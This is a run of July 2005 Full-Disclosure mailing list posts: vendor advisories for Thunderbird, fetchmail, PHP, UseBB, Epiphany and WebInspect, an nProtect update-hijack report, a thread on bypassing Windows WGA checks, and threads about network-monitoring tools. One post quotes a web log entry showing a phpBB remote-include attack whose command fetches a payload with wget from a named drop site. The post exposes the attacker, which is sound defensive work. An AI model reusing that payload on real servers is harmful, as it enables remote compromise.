[Full-disclosure] MDKSA-2005:127 - Updated mozilla-thunderbird packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Update Advisory ___ Package name: mozilla-thunderbird Advisory ID:MDKSA-2005:127 Date: July 28th, 2005 Affected versions: 10.2 __ Problem Description: A number of vulnerabilities were reported and fixed in Thunderbird 1.0.5 and Mozilla 1.7.9. The following vulnerabilities have been backported and patched for this update: The native implementations of InstallTrigger and other XPInstall- related javascript objects did not properly validate that they were called on instances of the correct type. By passing other objects, even raw numbers, the javascript interpreter would jump to the wrong place in memory. Although no proof of concept has been developed we believe this could be exploited (MFSA 2005-40). moz_bug_r_a4 reported several exploits giving an attacker the ability to install malicious code or steal data, requiring only that the user do commonplace actions like clicking on a link or open the context menu. The common cause in each case was privileged UI code ("chrome") being overly trusting of DOM nodes from the content window. Scripts in the web page can override properties and methods of DOM nodes and shadow the native values, unless steps are taken to get the true underlying values (MFSA 2005-41). Additional checks were added to make sure Javascript eval and Script objects are run with the privileges of the context that created them, not the potentially elevated privilege of the context calling them in order to protect against an additional variant of MFSA 2005-41 (MFSA 2005-44). In several places the browser UI did not correctly distinguish between true user events, such as mouse clicks or keystrokes, and synthetic events genenerated by web content. The problems ranged from minor annoyances like switching tabs or entering full-screen mode, to a variant on MFSA 2005-34 Synthetic events are now prevented from reaching the browser UI entirely rather than depend on each potentially spoofed function to protect itself from untrusted events (MFSA 2005-45). Scripts in XBL controls from web content continued to be run even when Javascript was disabled. By itself this causes no harm, but it could be combined with most script-based exploits to attack people running vulnerable versions who thought disabling javascript would protect them. In the Thunderbird and Mozilla Suite mail clients Javascript is disabled by default for protection against denial-of-service attacks and worms; this vulnerability could be used to bypass that protection (MFSA 2005-46). When InstallVersion.compareTo() is passed an object rather than a string it assumed the object was another InstallVersion without verifying it. When passed a different kind of object the browser would generally crash with an access violation. shutdown has demonstrated that different javascript objects can be passed on some OS versions to get control over the instruction pointer. We assume this could be developed further to run arbitrary machine code if the attacker can get exploit code loaded at a predictable address (MFSA 2005-50). A child frame can call top.focus() even if the framing page comes from a different origin and has overridden the focus() routine. The call is made in the context of the child frame. The attacker would look for a target site with a framed page that makes this call but doesn't verify that its parent comes from the same site. The attacker could steal cookies and passwords from the framed page, or take actions on behalf of a signed-in user. This attack would work only against sites that use frames in this manner (MFSA 2005-52). Parts of the browser UI relied too much on DOM node names without taking different namespaces into account and verifying that nodes really were of the expected type. An XHTML document could be used to create fake elements, for example, with content-defined properties that the browser would access as if they were the trusted built-in properties of the expected HTML elements. The severity of the vulnerability would depend on what the attacker could convince the victim to do, but could result in executing user-supplied script with elevated "chrome" privileges. This could be used to install malicious software on the victim's machine (MFSA 2005-55). Improper cloning of base objects allowed web content scripts to walk up the prototype chain to get to a privileged object. This could be used to execute code with enhanced privileges (MFSA 2005-56). The updated packages have been patched to address these issue. _
[Full-disclosure] MDKSA-2005:126 - Updated fetchmail packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Update Advisory ___ Package name: fetchmail Advisory ID:MDKSA-2005:126 Date: July 28th, 2005 Affected versions: 10.1, 10.2, Corporate 3.0, Corporate Server 2.1 __ Problem Description: A buffer overflow was discovered in fetchmail's POP3 client which could allow a malicious server to send a carefully crafted message UID, causing fetchmail to crash or potentially execute arbitrary code as the user running fetchmail. The updated packages have been patched to address this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2335 __ Updated Packages: Mandrakelinux 10.1: 563f08174b32d11c7d072a7c86672cd6 10.1/RPMS/fetchmail-6.2.5-5.1.101mdk.i586.rpm 322f5e01a8ccf969bf56c81b3c34 10.1/RPMS/fetchmail-daemon-6.2.5-5.1.101mdk.i586.rpm b41cd62c89bd4e728107b8fadb3d10dd 10.1/RPMS/fetchmailconf-6.2.5-5.1.101mdk.i586.rpm 9193b1c0ccf4d8dc1158a2707ff73628 10.1/SRPMS/fetchmail-6.2.5-5.1.101mdk.src.rpm Mandrakelinux 10.1/X86_64: e160ad934bb3007cf35c050006bd9bec x86_64/10.1/RPMS/fetchmail-6.2.5-5.1.101mdk.x86_64.rpm 193c90622e9279417f0d89e7368162d2 x86_64/10.1/RPMS/fetchmail-daemon-6.2.5-5.1.101mdk.x86_64.rpm 8b29df74bc7cc01ad0e57052908d96fb x86_64/10.1/RPMS/fetchmailconf-6.2.5-5.1.101mdk.x86_64.rpm 9193b1c0ccf4d8dc1158a2707ff73628 x86_64/10.1/SRPMS/fetchmail-6.2.5-5.1.101mdk.src.rpm Mandrakelinux 10.2: f25ca14a570b18627309b1ec6d6118bb 10.2/RPMS/fetchmail-6.2.5-10.1.102mdk.i586.rpm afdcff56a05aebf22b7cd138166d4ca7 10.2/RPMS/fetchmail-daemon-6.2.5-10.1.102mdk.i586.rpm 6d58bd3064e22875011b97cee9c2d809 10.2/RPMS/fetchmailconf-6.2.5-10.1.102mdk.i586.rpm 7d6ab32632446ed61fc18591f1c2fd00 10.2/SRPMS/fetchmail-6.2.5-10.1.102mdk.src.rpm Mandrakelinux 10.2/X86_64: 8f0f018bb2807d5285ae2ef05bb57107 x86_64/10.2/RPMS/fetchmail-6.2.5-10.1.102mdk.x86_64.rpm 870f31b16001b83be84e51cc93a92200 x86_64/10.2/RPMS/fetchmail-daemon-6.2.5-10.1.102mdk.x86_64.rpm 2f464f9c3409880ef9c457b9986ae712 x86_64/10.2/RPMS/fetchmailconf-6.2.5-10.1.102mdk.x86_64.rpm 7d6ab32632446ed61fc18591f1c2fd00 x86_64/10.2/SRPMS/fetchmail-6.2.5-10.1.102mdk.src.rpm Corporate Server 2.1: 96185810b7b4ad91d4986fd0d946a15d corporate/2.1/RPMS/fetchmail-6.1.0-1.3.C21mdk.i586.rpm 268fdaf86ca3f5f33b9c1ac0a00efc4a corporate/2.1/RPMS/fetchmail-daemon-6.1.0-1.3.C21mdk.i586.rpm 647d592ec242a09fa869da6f37660299 corporate/2.1/RPMS/fetchmailconf-6.1.0-1.3.C21mdk.i586.rpm 8d3e996da39619613de0046e7c9cb459 corporate/2.1/SRPMS/fetchmail-6.1.0-1.3.C21mdk.src.rpm Corporate Server 2.1/X86_64: d19fab3b9b57c4f9c9e4fe6aebd6ea81 x86_64/corporate/2.1/RPMS/fetchmail-6.1.0-1.3.C21mdk.x86_64.rpm 587dc00b22b6fd4e9b17f5bdb26457f6 x86_64/corporate/2.1/RPMS/fetchmail-daemon-6.1.0-1.3.C21mdk.x86_64.rpm 1d44d1c54e69049966b222ada486e633 x86_64/corporate/2.1/RPMS/fetchmailconf-6.1.0-1.3.C21mdk.x86_64.rpm 8d3e996da39619613de0046e7c9cb459 x86_64/corporate/2.1/SRPMS/fetchmail-6.1.0-1.3.C21mdk.src.rpm Corporate 3.0: 9d67bcb3d6485a0ffb243f9ed23cda22 corporate/3.0/RPMS/fetchmail-6.2.5-3.1.C30mdk.i586.rpm f9283b89d96efbbb8f2ce98abe00c563 corporate/3.0/RPMS/fetchmail-daemon-6.2.5-3.1.C30mdk.i586.rpm 4c170dbe398c93923d2a106dc6275c2e corporate/3.0/RPMS/fetchmailconf-6.2.5-3.1.C30mdk.i586.rpm f7c51eab215fe7c2e46baf154c315d26 corporate/3.0/SRPMS/fetchmail-6.2.5-3.1.C30mdk.src.rpm Corporate 3.0/X86_64: 6e40e50873f3ca1b49d948e1a3be052a x86_64/corporate/3.0/RPMS/fetchmail-6.2.5-3.1.C30mdk.x86_64.rpm 77d83cddcb9d2daf4b04a8ce09da90b7 x86_64/corporate/3.0/RPMS/fetchmail-daemon-6.2.5-3.1.C30mdk.x86_64.rpm a90e50cc1bbec81fbc8949ef5da5b87f x86_64/corporate/3.0/RPMS/fetchmailconf-6.2.5-3.1.C30mdk.x86_64.rpm f7c51eab215fe7c2e46baf154c315d26 x86_64/corporate/3.0/SRPMS/fetchmail-6.2.5-3.1.C30mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID
Re: [Full-disclosure] Defeating Microsoft WGA Validation Check
Or to restate, you mean "So many ways to skin a cat when it comes to exposing M$ insecurity..." =) right? hehe Scott. -- Don't believe every^H^H^H^H^Hanything the M$ advertising/P.R. dept tells you. On 7/28/05, Michael Evanchik <[EMAIL PROTECTED]> wrote: > > > > Btw, I know of 2 other ways do bypass this WGA myself as well. So many ways > to skin a cat when it comes to Microsoft security. > > > > Mike > > www.michaelevanchik.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] nProtect solutions arbitrary file download and execute vulnerability
Title: nProtect:Netizen arbitrary file download and execute vulnerability nProtectPersonal Web Service arbitrary file download and execute vulnerability Discoverer: PARK, GYU TAE ([EMAIL PROTECTED]) Neo Advisory No.: NRVA05-04 NRVA05-05 Critical: High critical Impact: Gain remote user's privilige Where: From remote Operating System: Windows Only Solution: Patched Notice: 07. 01. 2005 initiate notify 07. 04. 2005 Second notify 07. 26. 2005 Patched 07. 29. 2005 Disclosure vulnerability Description: The nProtect:Netizen and nProtectPersonal Web Service are an antivirus solutions. It defends user from Internet about well-known hack tools and viruses something When it need update and patch itself then download from web site such as update.nprotect.net that time nProtect update program, npdownv.exe, DO NOT CHECK THAT update site URL!!! We can change URL, update configuration file and so on But npdownv.exe DO CHECK files that downloaded from update site compressed WITH PASSWORD!!! this means npdownv.exe already known password for decompress I found password in npdownv.exe by REVERSE ENGINEEGERING and Neo modified liveup.haz, configuration file When user accees the phishing page then downloaded trojan from hacker URL See following detail describe: EXPLOIT NOT INCLUDED HERE Related link:http://www.nprotect.co.kr/service/nProtectPersonal/nprotect/npos/kor/personal_npos.html Special thanks for My best group [EMAIL PROTECTED]. PS. I'm very sorry for poor my konglish __두 유 야후!?스팸때문에 짜증나세요? 야후! 메일의 스팸 차단 기술로 메일을 보호합니다 http://mail.yahoo.co.kr ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [FLSA-2005:163559] Updated php packages fix security issues
- Fedora Legacy Update Advisory Synopsis: Updated php packages fix security issues Advisory ID: FLSA:163559 Issue date:2005-07-28 Product: Fedora Core Keywords: Bugfix CVE Names: CAN-2005-1751 CAN-2005-1921 - - 1. Topic: Updated PHP packages that fix two security issues are now available. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. 2. Relevant releases/architectures: Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: A bug was discovered in the PEAR XML-RPC Server package included in PHP. If a PHP script is used which implements an XML-RPC Server using the PEAR XML-RPC package, then it is possible for a remote attacker to construct an XML-RPC request which can cause PHP to execute arbitrary PHP commands as the 'apache' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2005-1921 to this issue. A race condition in temporary file handling was discovered in the shtool script installed by PHP. If a third-party PHP module which uses shtool was compiled as root, a local user may be able to modify arbitrary files. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2005-1751 to this issue. Users of PHP should upgrade to these updated packages, which contain backported fixes for these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=163559 6. RPMs required: Fedora Core 1: SRPM: http://download.fedoralegacy.org/fedora/1/updates/SRPMS/php-4.3.11-1.fc1.2.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/1/updates/i386/php-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-devel-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-domxml-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-imap-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-ldap-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-mbstring-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-mysql-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-odbc-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-pgsql-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-snmp-4.3.11-1.fc1.2.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/php-xmlrpc-4.3.11-1.fc1.2.legacy.i386.rpm Fedora Core 2: SRPM: http://download.fedoralegacy.org/fedora/2/updates/SRPMS/php-4.3.11-1.fc2.3.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/2/updates/i386/php-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-devel-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-domxml-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-imap-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-ldap-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-mbstring-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-mysql-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-odbc-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-pgsql-4.3.11-1.fc2.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/2/updates/i386/php-snmp-4.3.11-1.fc2.3.legacy.i386.rpm h
[Full-disclosure] Microsoft MSN MESSENGER PATCH PLUS. Download exclusivo para usurios registrados.
Just wanted to expose this spammers site. I noticed the following in my web logs: 200.233.226.8 - - [27/Jul/2005:20:16:08 -0700] "GET /admin_styles.php?phpbb_root_path=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;%20wget%20http://binaryshadow.org/~w00t /dc.txt;ls HTTP/1.1" 404 7279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.8) Gecko/20050511 Firefox/1.0.4" It is apparent from the logs above and research I have done that he is trying to exploit a phpBB vuln in order to compromise hosts and use them as spam relays. spammers drop site: http://www.binaryshadow.org/~w00t/ mirror: http://www.security-protocols.com/binaryshadow-mirror/ Thanks, Tom Ferris Researcher www.security-protocols.com Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Defeating Microsoft WGA Validation Check
Btw, I know of 2 other ways do bypass this WGA myself as well. So many ways to skin a cat when it comes to Microsoft security. Mike www.michaelevanchik.com From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty Sent: Wednesday, July 27, 2005 1:27 PM To: 'Full-Disclosure' Subject: RE: [Full-disclosure] Defeating Microsoft WGA Validation Check >> hi, I came across your site from the article at www.vnunet.com about this validation workaround. I just have a question, will this workaround work with Microsoft >> Windows Update site? I never tested it for Windows Update. However, as per M$ recent statement windows update will work irrespective of the OS being genuine or not. The test that I conducted was purely done for those Microsoft tools / products available on the M$ download centre which installs only on a genuine copy of Windows. >> No where in the article or on your workaround instructions mentions how this could also work with Windows Update site. Or I could have missed it or something, >> could this check work with W2K as well? FYI: Microsoft has fixed this issue immediately after few days of the workaround was released. So the workaround might not work for any of the current downloads from M$ download centre. Bad Luck ... ;o) There are still ways to circumvent WGA, I am currently working on it but can't comment anything at this point of time. Debasis Mohanty www.hackingspirits.com From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of goosee007 Sent: Wednesday, July 27, 2005 11:50 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Defeating Microsoft WGA Validation Check hi, I came across your site from the article at www.vnunet.com about this validation workaround. I just have a question, will this workaround work with Microsoft Windows Update site? No where in the article or on your workaround instructions mentions how this could also work with Windows Update site. Or I could have missed it or something, could this check work with W2K as well? thanks goose ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: bluetooth devices list ?
Also have a look at www.bluescanner.org for a Windows Bluetooth discovery tool. To pen-test at securityfocus.com, full-disclosure at lists.grok.org.uk, security-basics at securityfocus.com cc Subject bluetooth devices list ? Alo folks a) has anyone the last list about the vulnerables devices (mobile, devices, etc)under bluetooth ? something linke this: (the section "who´s vulnerable") http://www.thebunker.net/security/bluetooth.htm b) has anyone the best mail-lists, tools, links and research about the vulnerabilities about bluetooth? - Mark :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SPIDynamics WebInspect Cross-ApplicationScripting (XAS)
SPI Dynamics Security Bulletin SPI-0001-07282005 Issue: Potential WebInspect Cross Application Scripting (XAS) Vulnerability Severity: Low Potential Impact: Remote Code Execution Recommendation: All customers should run SmartUpdate to ensure they are running the latest version of WebInspect (5.5.386 or later). Affected Software: WebInspect 5.0.196 Non-Affected Software: WebInspect 5.5 QAInspect (all versions) DevInspect (all versions) SecureObjects (all versions) AMP (all versions) Description: SPI Dynamics has investigated a public report of a Cross Application Scripting (XAS) vulnerability in WebInspect. We have verified that WebInspect 5.5 (released May 16th, 2005) is not vulnerable however WebInspect version 5.0.196 was susceptible. We recommend all customers upgrade to WebInspect 5.5 which can be performed automatically at any time by running SmartUpdate. Background: Cross application scripting (XAS) is possible when an application executes data in a security context different from the original content (presumably one with less security restrictions). For example the data may be obtained from an un-trusted source (a remote web server) that is sent unfiltered into a trusted application such as when web content is downloaded from a remote server, and then re-displayed on the local host. Any application that downloads and then later displays and executes web content (such as JavaScript) may be vulnerable to XAS. Disclosure Timeline: April 15, 2005 08:01 AM – Initial disclosure to SPI Dynamics April 15, 2005 09:28 AM – Initial SPI Dynamics response July 26, 2005 04:45 AM– Public posting of disclosure (not coordinated with SPI Dynamics) Acknowledegements: SPI Dynamics wishes to thank Sergey V. Gordeychik for informing us of this vulnerability Disclaimer: The information provided in this bulletin is provided "as is" without warranty of any kind. SPI Dynamics, Inc. disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall SPI Dynamics, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if SPI Dynamics, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Revisions: V1.0 (July 27, 2005): Internal Release V1.1 (July 28, 2005): Bulletin published Contact: Security issues and questions related to security bulletins may be sent to SPI Dynamics at [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory 12/2005: UseBB Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened PHP Project www.hardened-php.net -= Security Advisory =- Advisory: UseBB Multiple Vulnerabilities Release Date: 2005/07/28 Last Modified: 2005/07/28 Author: Stefan Esser <[EMAIL PROTECTED]> Application: UseBB <= 0.5.1 Severity: Multiple SQL injection and XSS vulnerabilities may result in disclosure of administrators credentials. Risk: High Vendor Status: Vendor has released an updated version References: http://www.hardened-php.net/advisory_122005.60.html Overview: UseBB, the easy to set up and easy to use PHP and MySQL based forum package, distributed freely under the GPL license. It is being built by a team of voluntary developers from all over the world, for use on small to medium sized websites which need a clear and efficient forum package. By accident we stumbled over UseBB and audited it, because we have never seen a PHP forum system that is free of vulnerabilities. During our work, we have discovered two 2 holes that were not yet fixed in the CVS and may allow compromising user accounts. One of the vulnerabilities is a XSS vulnerability that is only exploitable in Internet Explorer and the other one is a SQL injection vulnerability that requires magic_quotes_gpc turned off to be exploitable, which is the recommended setting. Details: An audit of UseBB revealed that the code is actually one of the better pieces of PHP webapplications, although it uses the not recommended magic_quotes_runtime feature.. The authors always try to initialise their variables correctly and whenever possible they filter user input before using it. However we were able to find two glitches in their code. The first one is in the handling of the color BBCode. The color value is not filtered and therefore it is possible for an attacker to inject arbitrary stylesheet information for the resulting tag. Within Internet Explorer this will allow Javascript execution through f.e. through a call of the expression() function. The other problem is located in the way the magic_quotes_gpc=Off emulation is implemented. When the feature is deactivated, which is the recommended setting, _GET, _POST and _COOKIE are automatically addslashed(). Unfortunately _REQUEST is not automatically and therefore the search function of the forum, which is the only place where _REQUEST is used, is not protected at all against any kind of SQL injection, when magic_quotes_gpc is turned off. Both vulnerabilities could result in disclosure of arbitrary user credentials. Proof of Concept: The Hardened-PHP Project is not going to release an exploit for this vulnerability to the public. Disclosure Timeline: 27. July 2005 - Vendor informed. 27. July 2005 - Vendor has released updated version. 28. July 2005 - Public disclosure. Recommendation: We strongly recommend installing the updated version, 0.5.1a, which is available from the vendor's homepage, www.usebb.net. GPG-Key: http://www.hardened-php.net/hardened-php-signature-key.asc pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1 Copyright 2005 Stefan Esser / Hardened PHP Project. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQFC6VkdRDkUzAqGSqERAk2WAJ4ug+jsaGUS422U8vF3OSV/DfrOMACg05Ja 7xlU/Xg9j4J3JIayMEGkBXQ= =2IYe -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-155-2] Updated Epiphany packages to match Mozilla security update
=== Ubuntu Security Notice USN-155-2 July 28, 2005 epiphany-browser regressions https://bugzilla.ubuntu.com/show_bug.cgi?id=13041 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: epiphany-browser The problem can be corrected by upgrading the affected package to version 1.4.4-0ubuntu2.1. After a standard system upgrade you need to restart Epiphany to effect the necessary changes. Details follow: USN-155-1 fixed some security vulnerabilities of the Mozilla suite. Unfortunately this update caused regressions in the Epiphany web browser, which uses parts of the Mozilla browser. The updated packages fix these problems. Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.4.4-0ubuntu2.1.diff.gz Size/MD5:10444 722f5a62053980e2d528d8d694f6b2bd http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.4.4-0ubuntu2.1.dsc Size/MD5: 1991 be1cad27e897e68d4a51981b9d8191fd http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.4.4.orig.tar.gz Size/MD5: 4944377 6a77c7f33c9a84d90d1ce1616649d09a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_1.4.4-0ubuntu2.1_all.deb Size/MD5: 161556 c52390446288cdb37d8593b3b9e4a489 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.4.4-0ubuntu2.1_amd64.deb Size/MD5: 2878486 29b3d42e5239adec4ab36791f1415253 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.4.4-0ubuntu2.1_i386.deb Size/MD5: 2852102 da9e1980facf911a937fcc95085a0a75 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_1.4.4-0ubuntu2.1_powerpc.deb Size/MD5: 2850124 baf52c7b42143717ce4209acaa1570a2 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Considering nSight, any opinions?
On Thu, 28 Jul 2005, Jason Heschel wrote: > Hi list, > > I tried sending this to a SecurityFocus list but I think everyone's at > Blackhat or something. :) > > We've spent the last few weeks evaluating nSight (www.intrusense.com). > It's been very helpful in identifying exactly what, when and who is > eatting up all of our internal network bandwdith as well expose some > 'strange' internal network behavior which was causing some > intermittent problems with our Windows hosts. Anyways, we're now > considering making a purchase. > > I'm curious to hear any opinions, problems or praise people have for > this software. Does it scale well? It seems to collect a lot of > information. How does it perform after collecting several months worth > of data? While I'm not familiar with this product itself, this sounds like a knockoff of the Arbor product - which I LOVE, but which even the worlds largest NSPs cringe at in terms of price. If you have rudimentary shell scripting skills with just a touch of C, you can easily roll your own using netflow records. Barring that, this class of software provides useful information and I recommend them (by class) as "must have's" to any medium or larger network. HTH, //Alif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Considering nSight, any options?
Jason, Been running nSight for a little over a year now with data purge after 13 months. We have 3 agents at remote offices with each inspecting the traffic of around 700-900 hosts. It's been quite helpful. We *had* a ton of P2P traffic in our networks. When we started out last year, we tried to host all 3 agents on a low end HP blade (with a laptop hd). After about 2 months it became very slow (mostly due to disk IO). We upgraded to a faster blade with fast SCSI disk and it's been flying along ever since. Steve On 7/28/05, Jason Heschel <[EMAIL PROTECTED]> wrote:> Hi list,> > I tried sending this to a SecurityFocus list but I think everyone's at> Blackhat or something. :)> > We've spent the last few weeks evaluating nSight (www.intrusense.com).> It's been very helpful in identifying exactly what, when and who is> eatting up all of our internal network bandwdith as well expose some> 'strange' internal network behavior which was causing some> intermittent problems with our Windows hosts. Anyways, we're now> considering making a purchase.> > I'm curious to hear any opinions, problems or praise people have for> this software. Does it scale well? It seems to collect a lot of> information. How does it perform after collecting several months worth> of data?> > ; -jason> ___> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/> __Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Considering nSight, any opinions?
Jon, Actually ntop is what we're trying to move off of. It's a great tool, but we needed more data and more flexibility. We looked at Q1Labs QRadar as well, but couldn't afford it. nSight appears to be somewhere in the middle. On 7/28/05, Jon Dossey <[EMAIL PROTECTED]> wrote: > > Hi list, > > > > I tried sending this to a SecurityFocus list but I think everyone's at > > Blackhat or something. :) > > > > We've spent the last few weeks evaluating nSight (www.intrusense.com). > > It's been very helpful in identifying exactly what, when and who is > > eatting up all of our internal network bandwdith as well expose some > > 'strange' internal network behavior which was causing some > > intermittent problems with our Windows hosts. Anyways, we're now > > considering making a purchase. > > > > I'm curious to hear any opinions, problems or praise people have for > > this software. Does it scale well? It seems to collect a lot of > > information. How does it perform after collecting several months worth > > of data? > > > > -jason > > I'm a big fan of NTOP (http://www.ntop.org) personally. > > Just span some ports on a core switch, setup your netflows, and watch > the fireworks. Great piece of software. Just need to remember the > PF_RING kernel patch if you're capturing a significant amount of > traffic. > > .jon > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Considering nSight, any opinions?
Hi list, I tried sending this to a SecurityFocus list but I think everyone's at Blackhat or something. :) We've spent the last few weeks evaluating nSight (www.intrusense.com). It's been very helpful in identifying exactly what, when and who is eatting up all of our internal network bandwdith as well expose some 'strange' internal network behavior which was causing some intermittent problems with our Windows hosts. Anyways, we're now considering making a purchase. I'm curious to hear any opinions, problems or praise people have for this software. Does it scale well? It seems to collect a lot of information. How does it perform after collecting several months worth of data? -jason ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
